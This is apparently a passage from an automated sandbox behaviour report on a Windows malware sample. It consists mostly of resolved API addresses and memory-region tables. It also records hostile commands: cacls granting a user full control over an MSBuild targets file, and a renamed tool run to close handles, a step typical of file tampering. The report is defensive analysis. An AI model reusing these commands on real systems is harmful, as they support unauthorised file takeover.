| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:03 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #93: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #93 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:26, Reason: Child Process |
| Unmonitor | End Time: 00:04:28, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x550 |
| Parent PID | 0xec4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
2EC
0x
720
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000a70000 | 0x00a70000 | 0x00a8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x00a7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000a80000 | 0x00a80000 | 0x00a83fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00a91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00a93fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000aa0000 | 0x00aa0000 | 0x00ab3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b40000 | 0x00b40000 | 0x00b43fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b50000 | 0x00b50000 | 0x00b50fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00b61fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00b70000 | 0x00c2dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c30000 | 0x00c30000 | 0x00c6ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00c70000 | 0x00c71fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000c80000 | 0x00c80000 | 0x00c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cd0000 | 0x00cd0000 | 0x00d0ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x00d70000 | 0x00d79fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000d80000 | 0x00d80000 | 0x04d7ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004d80000 | 0x04d80000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04ec0000 | 0x051f6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74650000 | 0x74677fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed00000 | 0x7ed00000 | 0x7edfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee00000 | 0x7ee00000 | 0x7ee22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee23000 | 0x7ee23000 | 0x7ee23fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee28000 | 0x7ee28000 | 0x7ee2afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee2b000 | 0x7ee2b000 | 0x7ee2bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee2d000 | 0x7ee2d000 | 0x7ee2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #94: vidhs3md.exe
175
0
| Information | Value |
|---|---|
| ID | #94 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:26, Reason: Child Process |
| Unmonitor | End Time: 00:04:28, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2dc |
| Parent PID | 0x578 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
5A0
0x
6E8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007b0000 | 0x007b0000 | 0x00937fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00ac0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000ad0000 | 0x00ad0000 | 0x01ecffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74380000 | 0x74411fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
